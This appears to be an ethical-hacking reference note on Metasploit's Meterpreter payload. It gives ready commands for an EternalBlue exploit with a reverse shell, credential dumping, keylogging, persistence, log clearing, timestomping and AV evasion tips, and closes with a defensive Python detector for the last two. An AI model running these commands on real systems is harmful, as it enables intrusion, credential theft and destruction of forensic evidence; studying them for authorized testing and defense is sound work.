# Meterpreter
## Overview
Meterpreter (Meta-Interpreter) is an advanced, dynamically extensible payload that runs entirely in memory on a compromised host. It is the primary post-exploitation shell within Metasploit, communicating over an encrypted channel and leaving minimal disk artifacts.
- **Category:** #maintaining-access #post-exploitation #payload
- **Phase:** Maintaining Access
- **Part Of:** Metasploit Framework
## Key Characteristics
- In-memory only — does not write to disk by default (evades disk-based AV)
- Encrypted comms — uses TLS to communicate with the handler
- Extensible — dynamically loads extensions without restarting
- Channel-based — can open multiple simultaneous data channels
- Pivoting capable — can route traffic through the compromised host
## Getting a Meterpreter Session

```
# In msfconsole — example using EternalBlue
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
run
# Meterpreter prompt appears:
meterpreter >
```
## Core Commands

### System Information

```
sysinfo   # Hostname, OS, architecture, domain
getuid    # Who you're running as
getpid    # Current process ID
ps        # List all running processes
```
### File System

```
pwd                 # Print working directory
ls                  # List directory
cd C:\\Users        # Change directory
cat file.txt        # Read file
upload /local/file.txt C:\\Temp\\file.txt
download C:\\passwords.txt /local/loot/
search -f *.txt     # Search for files by pattern
```
### Privilege Escalation

```
getsystem   # Auto-attempt multiple privesc methods
getuid      # Confirm NT AUTHORITY\SYSTEM
run post/multi/recon/local_exploit_suggester   # Find local privesc paths
```
### Process Manipulation

```
migrate 1234   # Migrate into another process by PID
# Migrate into explorer.exe or lsass.exe for stability/credential access
```
### Credential Harvesting

```
hashdump           # Dump local SAM database (NTLM hashes)
run post/windows/gather/credentials/credential_collector
load kiwi          # Load Mimikatz-like module
creds_all          # Dump all credential types (requires kiwi)
lsa_dump_sam       # SAM database via kiwi
lsa_dump_secrets   # LSA secrets via kiwi
```
### Persistence

```
run post/windows/manage/persistence_exe
run post/linux/manage/cron_persistence
# Note: persistence leaves artifacts — confirm scope allows this
```
### Pivoting & Port Forwarding

```
# Forward local port to internal host via compromised machine
portfwd add -l 3389 -p 3389 -r 10.10.10.5

# Set up SOCKS proxy through the session for full pivoting
# Background the session first:
background
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
```
### Networking

```
ipconfig / ifconfig   # Network interfaces
arp                   # ARP table (discover other hosts)
route                 # Routing table
```
### Stealth

```
timestomp C:\\file.txt -m "01/01/2020 00:00:00"   # Modify timestamps
clearev                                            # Clear Windows event logs
```
### Screenshots & Keylogging

```
screenshot      # Capture desktop screenshot
keyscan_start   # Start keylogger
keyscan_dump    # Dump captured keystrokes
keyscan_stop    # Stop keylogger
```
## Meterpreter Variants

| Payload | Target |
|---|---|
| windows/meterpreter/reverse_tcp | Windows x86 |
| windows/x64/meterpreter/reverse_tcp | Windows x64 |
| linux/x86/meterpreter/reverse_tcp | Linux x86 |
| linux/x64/meterpreter/reverse_tcp | Linux x64 |
| java/meterpreter/reverse_tcp | Cross-platform (JVM) |
| php/meterpreter_reverse_tcp | PHP web shells |
| python/meterpreter/reverse_tcp | Python environments |
| android/meterpreter/reverse_tcp | Android |
## OPSEC Notes
Although Meterpreter is memory-resident, it is well-known to AV/EDR vendors. Use encoders, custom stagers, or commercial C2 frameworks for engagements against hardened targets. Always operate within authorized scope.
`clearev` and `timestomp` can destroy forensic evidence — confirm this is within scope.
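The defender's side of the two Stealth commands above, as an added example that is not part of the original note: `timestomp` rewrites only the `$STANDARD_INFORMATION` timestamps, and `clearev` itself leaves a "log cleared" event behind, so both can be spotted after the fact. The MFT records and event entries below are constructed, and the field names are assumptions for this illustration.

```python
from datetime import datetime

# Constructed MFT-style records: (path, $STANDARD_INFORMATION mtime, $FILE_NAME mtime).
# A real feed would come from an $MFT parser; these values are made up for the example.
MFT_RECORDS = [
    ("C:\\Temp\\file.txt", "2020-01-01T00:00:00.000000", "2024-05-14T09:12:33.418221"),
    ("C:\\Windows\\notepad.exe", "2023-11-02T08:00:00.771035", "2023-11-02T08:00:00.771035"),
    ("C:\\Users\\alice\\report.docx", "2024-06-01T10:00:00.000000", "2024-03-01T09:00:00.250000"),
]

# Constructed Windows event records in the shape a SIEM export might use (field names assumed).
EVENT_LOG = [
    {"event_id": 4624, "channel": "Security", "message": "An account was successfully logged on."},
    {"event_id": 1102, "channel": "Security", "message": "The audit log was cleared."},
    {"event_id": 104, "channel": "System", "message": "The System log file was cleared."},
    {"event_id": 4688, "channel": "Security", "message": "A new process has been created."},
]

# 1102 = Security audit log cleared; 104 = System/Application log cleared (Microsoft-Windows-Eventlog).
LOG_CLEARED_IDS = {1102, 104}


def find_timestomped(records, tolerance_s=1.0):
    """Flag records whose $STANDARD_INFORMATION ($SI) times look rewritten.

    timestomp only rewrites $SI; the $FILE_NAME ($FN) attribute is maintained
    by the NTFS driver and is normally not newer than $SI. Two indicators:
      1. $SI mtime earlier than $FN mtime (strong);
      2. $SI mtime with no sub-second part, which a value typed at one-second
         granularity ("01/01/2020 00:00:00") leaves on a 100 ns resolution
         filesystem (weaker: copies from FAT or SMB shares look the same).
    """
    hits = []
    for path, si_mtime, fn_mtime in records:
        si, fn = datetime.fromisoformat(si_mtime), datetime.fromisoformat(fn_mtime)
        reasons = []
        if (fn - si).total_seconds() > tolerance_s:
            reasons.append("$SI mtime earlier than $FN mtime")
        if si.microsecond == 0:
            reasons.append("$SI mtime has no sub-second component")
        if reasons:
            hits.append((path, reasons))
    return hits


def find_log_clears(events):
    """Return events recording that a log was cleared, the trace clearev itself leaves."""
    return [e for e in events if e["event_id"] in LOG_CLEARED_IDS]
```

Run `find_timestomped(MFT_RECORDS)` and `find_log_clears(EVENT_LOG)` over real parser output; the zero-sub-second check is a weak signal on its own and is best combined with the `$SI`/`$FN` comparison.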
## Related Tools
- Metasploit — Parent framework; Meterpreter is its primary payload
- Netcat — Lightweight alternative when Meterpreter is too heavy/detected
- LinPEAS / WinPEAS — Run these from within Meterpreter for privesc enumeration
## Tags
#ethical-hacking #maintaining-access #post-exploitation #payload #meterpreter